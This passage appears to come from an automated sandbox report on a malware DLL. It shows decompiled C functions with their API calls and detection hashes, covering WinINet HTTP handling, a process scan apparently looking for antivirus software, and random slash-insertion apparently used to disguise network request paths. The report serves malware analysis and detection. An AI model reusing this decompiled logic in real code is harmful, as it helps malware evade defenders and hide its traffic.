                    										_push( *((intOrPtr*)(_t69 + 0x18)));
                    										if( *0x444a164() != 0) {
                    											goto L17;
                    										}
                    										_t64 = GetLastError();
                    										if(_t64 == 0x3e5) {
                    											_t64 = E04445867( *(_t69 + 0x1c), _t61, 0xffffffff);
                    											if(_t64 == 0) {
                    												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                    												if(_t64 == 0) {
                    													goto L17;
                    												}
                    											}
                    										}
                    										L19:
                    										E044417AB(_v16);
                    										if(_t64 == 0) {
                    											_t64 = E044416E7(_v12, _t69);
                    										}
                    										goto L22;
                    										L17:
                    										_t64 = 0;
                    										if(_v8 != 0) {
                    											_push(0);
                    											_push(_v8);
                    											_push(_v16);
                    											continue;
                    										}
                    										goto L19;
                    									}
                    								}
                    								L22:
                    								_t39 = _v12;
                    								 *((intOrPtr*)( *_t39 + 8))(_t39);
                    							}
                    						}
                    					} else {
                    						_t64 = GetLastError();
                    						if(_t64 != 0x3e5) {
                    							L8:
                    							if(_t64 == 0) {
                    								goto L9;
                    							}
                    						} else {
                    							_t64 = E04445867( *(_t69 + 0x1c), _t58, 0xffffffff);
                    							if(_t64 == 0) {
                    								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                    								goto L8;
                    							}
                    						}
                    					}
                    					return _t64;
                    				} else {
                    					_t54 = E044458EE(__ecx, __eax);
                    					if(_t54 != 0) {
                    						return _t54;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    			}

















                    APIs
                    • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 04442409
                    • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 04442422
                    • ResetEvent.KERNEL32(?), ref: 0444249B
                    • GetLastError.KERNEL32 ref: 044424B6
                      • Part of subcall function 044458EE: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04445905
                      • Part of subcall function 044458EE: SetEvent.KERNEL32(?), ref: 04445915
                      • Part of subcall function 044458EE: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04445947
                      • Part of subcall function 044458EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0444596C
                      • Part of subcall function 044458EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0444598C
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
                    • String ID:
                    • API String ID: 2176574591-0
                    • Opcode ID: 743124e2a8093381d8f692b1df20c412d99804a8d659c18878ded559511f95d7
                    • Instruction ID: 1889529c2286247e805afa08f3e32dc3611602b943ff8b0539d899552466338d
                    • Opcode Fuzzy Hash: 743124e2a8093381d8f692b1df20c412d99804a8d659c18878ded559511f95d7
                    • Instruction Fuzzy Hash: 6541D236A00600ABFF219FA5DC44AAB73B9FFC43A5F1505AAF515E3250EBB0F9419B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E04443FD2(signed int _a4, signed int* _a8) {
                    				void* __ecx;
                    				void* __edi;
                    				signed int _t6;
                    				intOrPtr _t8;
                    				intOrPtr _t12;
                    				short* _t19;
                    				void* _t25;
                    				void* _t26;
                    				signed int* _t28;
                    				CHAR* _t30;
                    				long _t31;
                    				intOrPtr* _t32;
                    
                    				_t6 =  *0x444a310; // 0xd448b889
                    				_t32 = _a4;
                    				_a4 = _t6 ^ 0x109a6410;
                    				_t8 =  *0x444a320; // 0xafd5a8
                    				_t3 = _t8 + 0x444b87e; // 0x61636f4c
                    				_t25 = 0;
                    				_t30 = E044432D0(_t3, 1);
                    				if(_t30 != 0) {
                    					_t25 = CreateEventA(0x444a34c, 1, 0, _t30);
                    					E044417AB(_t30);
                    				}
                    				_t12 =  *0x444a2fc; // 0x4000000a
                    				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04442AB4() != 0) {
                    					L12:
                    					_t28 = _a8;
                    					if(_t28 != 0) {
                    						 *_t28 =  *_t28 | 0x00000001;
                    					}
                    					_t31 = E0444196A(_t32, _t26);
                    					if(_t31 == 0 && _t25 != 0) {
                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                    					}
                    					if(_t28 != 0 && _t31 != 0) {
                    						 *_t28 =  *_t28 & 0xfffffffe;
                    					}
                    					goto L20;
                    				} else {
                    					_t19 =  *0x444a118( *_t32, 0x20);
                    					if(_t19 != 0) {
                    						 *_t19 = 0;
                    						_t19 = _t19 + 2;
                    					}
                    					_t31 = E044478DB(0,  *_t32, _t19, 0);
                    					if(_t31 == 0) {
                    						if(_t25 == 0) {
                    							L22:
                    							return _t31;
                    						}
                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                    						if(_t31 == 0) {
                    							L20:
                    							if(_t25 != 0) {
                    								CloseHandle(_t25);
                    							}
                    							goto L22;
                    						}
                    					}
                    					goto L12;
                    				}
                    			}
















                    APIs
                      • Part of subcall function 044432D0: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04F49D58,00000000,?,?,69B25F44,00000005,0444A00C,4D283A53,?,?), ref: 04443306
                      • Part of subcall function 044432D0: lstrcpy.KERNEL32(00000000,00000000), ref: 0444332A
                      • Part of subcall function 044432D0: lstrcat.KERNEL32(00000000,00000000), ref: 04443332
                    • CreateEventA.KERNEL32(0444A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0444186F,?,?,?), ref: 04444013
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,0444186F,00000000,00000000,?,00000000,?,0444186F,?,?,?), ref: 04444071
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0444186F,?,?,?), ref: 0444409F
                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0444186F,?,?,?), ref: 044440B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                    • String ID:
                    • API String ID: 73268831-0
                    • Opcode ID: 4e7935fc211184c057886455c607bc7d16c1c562b11ac1ea7eb22a057b3a7e14
                    • Instruction ID: 5db051aa944bdb0e2439a9405e45ebdd2d4b3dad44aaddae055358498fbc1400
                    • Opcode Fuzzy Hash: 4e7935fc211184c057886455c607bc7d16c1c562b11ac1ea7eb22a057b3a7e14
                    • Instruction Fuzzy Hash: 562104326407505BFF315BA89888B6BB2E8EFC8B15F05061BFA41AB242DB61EC518641
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E044417C0(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                    				intOrPtr _v12;
                    				void* _v16;
                    				void* _v28;
                    				char _v32;
                    				void* __esi;
                    				void* _t29;
                    				void* _t38;
                    				signed int* _t39;
                    				void* _t40;
                    
                    				_t36 = __ecx;
                    				_v32 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v12 = _a4;
                    				_t38 = E04446710(__ecx,  &_v32);
                    				if(_t38 != 0) {
                    					L12:
                    					_t39 = _a8;
                    					L13:
                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                    						_t23 =  &(_t39[1]);
                    						if(_t39[1] != 0) {
                    							E0444238A(_t23);
                    						}
                    					}
                    					return _t38;
                    				}
                    				if(E044440C7(0x40,  &_v16) != 0) {
                    					_v16 = 0;
                    				}
                    				_t40 = CreateEventA(0x444a34c, 1, 0,  *0x444a3e4);
                    				if(_t40 != 0) {
                    					SetEvent(_t40);
                    					Sleep(0xbb8);
                    					CloseHandle(_t40);
                    				}
                    				_push( &_v32);
                    				if(_a12 == 0) {
                    					_t29 = E04445E53(_t36);
                    				} else {
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_t29 = E04442B1E(_t36);
                    				}
                    				_t41 = _v16;
                    				_t38 = _t29;
                    				if(_v16 != 0) {
                    					E04444B59(_t41);
                    				}
                    				if(_t38 != 0) {
                    					goto L12;
                    				} else {
                    					_t39 = _a8;
                    					_t38 = E04443FD2( &_v32, _t39);
                    					goto L13;
                    				}
                    			}













                    APIs
                    • CreateEventA.KERNEL32(0444A34C,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 04441811
                    • SetEvent.KERNEL32(00000000), ref: 0444181E
                    • Sleep.KERNEL32(00000BB8), ref: 04441829
                    • CloseHandle.KERNEL32(00000000), ref: 04441830
                      • Part of subcall function 04445E53: WaitForSingleObject.KERNEL32(00000000,?,?,?,04441850,?,04441850,?,?,?,?,?,04441850,?), ref: 04445F2D
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                    • String ID:
                    • API String ID: 2559942907-0
                    • Opcode ID: ebcbcce1af28cc46ecea6f1fe75c3a5f84a50a71784e91d8a5922a4e267cef1d
                    • Instruction ID: 9a781f004290fac0047aec5326d1d98bd404774c4474344edb5aabfe70d94357
                    • Opcode Fuzzy Hash: ebcbcce1af28cc46ecea6f1fe75c3a5f84a50a71784e91d8a5922a4e267cef1d
                    • Instruction Fuzzy Hash: 2A219872E00519ABFF20AFF588889DF7779EBC4364B05442BEA11A7100DB74BD818BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E04445ACD(unsigned int __eax, void* __ecx) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _t21;
                    				signed short _t23;
                    				char* _t27;
                    				void* _t29;
                    				void* _t30;
                    				unsigned int _t33;
                    				void* _t37;
                    				unsigned int _t38;
                    				void* _t41;
                    				void* _t42;
                    				int _t45;
                    				void* _t46;
                    
                    				_t42 = __eax;
                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                    				_t38 = __eax;
                    				_t30 = RtlAllocateHeap( *0x444a2d8, 0, (__eax >> 3) + __eax + 1);
                    				_v12 = _t30;
                    				if(_t30 != 0) {
                    					_v8 = _t42;
                    					do {
                    						_t33 = 0x18;
                    						if(_t38 <= _t33) {
                    							_t33 = _t38;
                    						}
                    						_t21 =  *0x444a2f0; // 0x103638ac
                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                    						 *0x444a2f0 = _t23;
                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                    						memcpy(_t30, _v8, _t45);
                    						_v8 = _v8 + _t45;
                    						_t27 = _t30 + _t45;
                    						_t38 = _t38 - _t45;
                    						_t46 = _t46 + 0xc;
                    						 *_t27 = 0x2f;
                    						_t13 = _t27 + 1; // 0x1
                    						_t30 = _t13;
                    					} while (_t38 > 8);
                    					memcpy(_t30, _v8, _t38 + 1);
                    				}
                    				return _v12;
                    			}

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0444194D,00000000,?,?,04446ABB,?,04F495B0), ref: 04445AD8
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04445AF0
                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0444194D,00000000,?,?,04446ABB,?,04F495B0), ref: 04445B34
                    • memcpy.NTDLL(00000001,?,00000001), ref: 04445B55
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: memcpy$AllocateHeaplstrlen
                    • String ID:
                    • API String ID: 1819133394-0
                    • Opcode ID: 8649ad74a5bf4ebf65ad89b879b679dd40191cd5ff474a44f1af4870c5a2341b
                    • Instruction ID: 2f1b9b9a9b7cdaf8dac9602dacaf7c7a9c96e94dded1c8dc123fd15b1d39b2b6
                    • Opcode Fuzzy Hash: 8649ad74a5bf4ebf65ad89b879b679dd40191cd5ff474a44f1af4870c5a2341b
                    • Instruction Fuzzy Hash: 55112976A00214BFEB148B69DC84E9FFBEDEBC0260B040176F504D7281E674AE04D7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E04442AB4() {
                    				char _v264;
                    				void* _v300;
                    				int _t8;
                    				intOrPtr _t9;
                    				int _t15;
                    				void* _t17;
                    
                    				_t15 = 0;
                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                    				if(_t17 != 0) {
                    					_t8 = Process32First(_t17,  &_v300);
                    					while(_t8 != 0) {
                    						_t9 =  *0x444a320; // 0xafd5a8
                    						_t2 = _t9 + 0x444bea8; // 0x73617661
                    						_push( &_v264);
                    						if( *0x444a110() != 0) {
                    							_t15 = 1;
                    						} else {
                    							_t8 = Process32Next(_t17,  &_v300);
                    							continue;
                    						}
                    						L7:
                    						CloseHandle(_t17);
                    						goto L8;
                    					}
                    					goto L7;
                    				}
                    				L8:
                    				return _t15;
                    			}

                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04442AC4
                    • Process32First.KERNEL32(00000000,?), ref: 04442AD7
                    • Process32Next.KERNEL32(00000000,?), ref: 04442B03
                    • CloseHandle.KERNEL32(00000000), ref: 04442B12
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: ee5e859741b48af49908be982cb52c299c02b0f17e245917f58920e389d1ed83
                    • Instruction ID: b738b76d4da77b775af57eef10cef9e60243186ed566b9e46a85e30aa95d6505
                    • Opcode Fuzzy Hash: ee5e859741b48af49908be982cb52c299c02b0f17e245917f58920e389d1ed83
                    • Instruction Fuzzy Hash: 3AF0F6322001246BFF30AF268C09EEB36ACEBC9355F0000E2F905E3101EA64EA4687A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04446156(void* __esi) {
                    				struct _SECURITY_ATTRIBUTES* _v4;
                    				void* _t8;
                    				void* _t10;
                    
                    				_v4 = 0;
                    				memset(__esi, 0, 0x38);
                    				_t8 = CreateEventA(0, 1, 0, 0);
                    				 *(__esi + 0x1c) = _t8;
                    				if(_t8 != 0) {
                    					_t10 = CreateEventA(0, 1, 1, 0);
                    					 *(__esi + 0x20) = _t10;
                    					if(_t10 == 0) {
                    						CloseHandle( *(__esi + 0x1c));
                    					} else {
                    						_v4 = 1;
                    					}
                    				}
                    				return _v4;
                    			}

                    APIs
                    • memset.NTDLL ref: 04446164
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04446179
                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04446186
                    • CloseHandle.KERNEL32(?), ref: 04446198
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CreateEvent$CloseHandlememset
                    • String ID:
                    • API String ID: 2812548120-0
                    • Opcode ID: fdc1a9ef6a98cff9f6d1ab539b6ac69c5de808f045956be52a442e0eaeaf24bc
                    • Instruction ID: a8da7f7894af9013c455ae2853f61b1b43b78ccfaa69b79715b639e91d0d3a19
                    • Opcode Fuzzy Hash: fdc1a9ef6a98cff9f6d1ab539b6ac69c5de808f045956be52a442e0eaeaf24bc
                    • Instruction Fuzzy Hash: E3F0FEF510430C7FE7205F26DCC4C27BBADFB862D9B12492EF04691542DA36BC199A70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0444137B() {
                    				void* _t1;
                    				intOrPtr _t5;
                    				void* _t6;
                    				void* _t7;
                    				void* _t11;
                    
                    				_t1 =  *0x444a30c; // 0x2e4
                    				if(_t1 == 0) {
                    					L8:
                    					return 0;
                    				}
                    				SetEvent(_t1);
                    				_t11 = 0x7fffffff;
                    				while(1) {
                    					SleepEx(0x64, 1);
                    					_t5 =  *0x444a358; // 0x0
                    					if(_t5 == 0) {
                    						break;
                    					}
                    					_t11 = _t11 - 0x64;
                    					if(_t11 > 0) {
                    						continue;
                    					}
                    					break;
                    				}
                    				_t6 =  *0x444a30c; // 0x2e4
                    				if(_t6 != 0) {
                    					CloseHandle(_t6);
                    				}
                    				_t7 =  *0x444a2d8; // 0x4b50000
                    				if(_t7 != 0) {
                    					HeapDestroy(_t7);
                    				}
                    				goto L8;
                    			}

                    APIs
                    • SetEvent.KERNEL32(000002E4,00000001,044410AA), ref: 04441386
                    • SleepEx.KERNEL32(00000064,00000001), ref: 04441395
                    • CloseHandle.KERNEL32(000002E4), ref: 044413B6
                    • HeapDestroy.KERNEL32(04B50000), ref: 044413C6
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CloseDestroyEventHandleHeapSleep
                    • String ID:
                    • API String ID: 4109453060-0
                    • Opcode ID: 4c23727e41435bfde26b856b38507c7b6b6dde493661e0e6b79207cc7597aaf8
                    • Instruction ID: 6fa136d344688777db6cd60d1eb6406f3f5c2e107f5c16dde2278c79213a611c
                    • Opcode Fuzzy Hash: 4c23727e41435bfde26b856b38507c7b6b6dde493661e0e6b79207cc7597aaf8
                    • Instruction Fuzzy Hash: FEF03079B413119BFB20AB35D84CB573BE8EB84B61B040511BC50E3785EF28EC80A560
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0444395B(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                    				intOrPtr* _v8;
                    				void* _t17;
                    				intOrPtr* _t22;
                    				void* _t27;
                    				char* _t30;
                    				void* _t33;
                    				void* _t34;
                    				void* _t36;
                    				void* _t37;
                    				void* _t39;
                    				int _t42;
                    
                    				_t17 = __eax;
                    				_t37 = 0;
                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                    				_t2 = _t17 + 1; // 0x1
                    				_t28 = _t2;
                    				_t34 = E044463FD(_t2);
                    				if(_t34 != 0) {
                    					_t30 = E044463FD(_t28);
                    					if(_t30 == 0) {
                    						E044417AB(_t34);
                    					} else {
                    						_t39 = _a4;
                    						_t22 = E0444799A(_t39);
                    						_v8 = _t22;
                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                    							_a4 = _t39;
                    						} else {
                    							_t26 = _t22 + 2;
                    							_a4 = _t22 + 2;
                    							_t22 = E0444799A(_t26);
                    							_v8 = _t22;
                    						}
                    						if(_t22 == 0) {
                    							__imp__(_t34, _a4);
                    							 *_t30 = 0x2f;
                    							 *((char*)(_t30 + 1)) = 0;
                    						} else {
                    							_t42 = _t22 - _a4;
                    							memcpy(_t34, _a4, _t42);
                    							 *((char*)(_t34 + _t42)) = 0;
                    							__imp__(_t30, _v8);
                    						}
                    						 *_a8 = _t34;
                    						_t37 = 1;
                    						 *_a12 = _t30;
                    					}
                    				}
                    				return _t37;
                    			}

                    APIs
                    • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,044443F7,?,?,?,?,00000102,04441AE3,?,?,00000000), ref: 04443967
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                      • Part of subcall function 0444799A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04443995,00000000,00000001,00000001,?,?,044443F7,?,?,?,?,00000102), ref: 044479A8
                      • Part of subcall function 0444799A: StrChrA.SHLWAPI(?,0000003F,?,?,044443F7,?,?,?,?,00000102,04441AE3,?,?,00000000,00000000), ref: 044479B2
                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044443F7,?,?,?,?,00000102,04441AE3,?), ref: 044439C5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 044439D5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 044439E1
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                    • String ID:
                    • API String ID: 3767559652-0
                    • Opcode ID: a9ea7e0508b6b5c5517071f8096861fe7251fd40023281b0640ad9a58aa249a5
                    • Instruction ID: 68076286b7bfd928c96b7c8093a42a3ef6687cb9ee922d967f06c5487609d8fb
                    • Opcode Fuzzy Hash: a9ea7e0508b6b5c5517071f8096861fe7251fd40023281b0640ad9a58aa249a5
                    • Instruction Fuzzy Hash: FC21D572600295ABFF119FB5C844A9FBFB8EF86694F044056FD049B302D734E901D7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0444114D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                    				void* _v8;
                    				void* _t18;
                    				int _t25;
                    				int _t29;
                    				int _t34;
                    
                    				_t29 = lstrlenW(_a4);
                    				_t25 = lstrlenW(_a8);
                    				_t18 = E044463FD(_t25 + _t29 + _t25 + _t29 + 2);
                    				_v8 = _t18;
                    				if(_t18 != 0) {
                    					_t34 = _t29 + _t29;
                    					memcpy(_t18, _a4, _t34);
                    					_t10 = _t25 + 2; // 0x2
                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                    				}
                    				return _v8;
                    			}

                    APIs
                    • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,04F493CC,?,04443418,004F0053,04F493CC,?,?,?,?,?,?,044454F9), ref: 0444115D
                    • lstrlenW.KERNEL32(04443418,?,04443418,004F0053,04F493CC,?,?,?,?,?,?,044454F9), ref: 04441164
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04443418,004F0053,04F493CC,?,?,?,?,?,?,044454F9), ref: 04441184
                    • memcpy.NTDLL(74E069A0,04443418,00000002,00000000,004F0053,74E069A0,?,?,04443418,004F0053,04F493CC), ref: 04441197
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlenmemcpy$AllocateHeap
                    • String ID:
                    • API String ID: 2411391700-0
                    • Opcode ID: 27a79944b8c5bfcd4d25d5ec5fc49ab93dfa5ce987add84bf5e6b97a046be0e8
                    • Instruction ID: 67c988cb6b2870b7b355f4c14a8e5cc749fdc0ab18016b5c668626b94ae0f4be
                    • Opcode Fuzzy Hash: 27a79944b8c5bfcd4d25d5ec5fc49ab93dfa5ce987add84bf5e6b97a046be0e8
                    • Instruction Fuzzy Hash: 89F04F76900118BBDF11DFA9CC44C9F7BECEF49298B014067F908D7202E671EA149BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrlen.KERNEL32(04F49B50,00000000,00000000,7691C740,04446AE6,00000000), ref: 0444253A
                    • lstrlen.KERNEL32(?), ref: 04442542
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • lstrcpy.KERNEL32(00000000,04F49B50), ref: 04442556
                    • lstrcat.KERNEL32(00000000,?), ref: 04442561
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                    • String ID:
                    • API String ID: 74227042-0
                    • Opcode ID: 896df1067633f1ed81f993daf45dbca9ad48935383fe70d4cb75712179f657e3
                    • Instruction ID: 47bac566320ad840a91781c95e3b8952ecb4306375e511ebe5e0c74e570aa17a
                    • Opcode Fuzzy Hash: 896df1067633f1ed81f993daf45dbca9ad48935383fe70d4cb75712179f657e3
                    • Instruction Fuzzy Hash: 58E0927750126067A7119BF8AC48CAFBBACFFCA750708041BFA00D3101CB289D01DBA1
                    Uniqueness

                    Uniqueness Score: -1.00%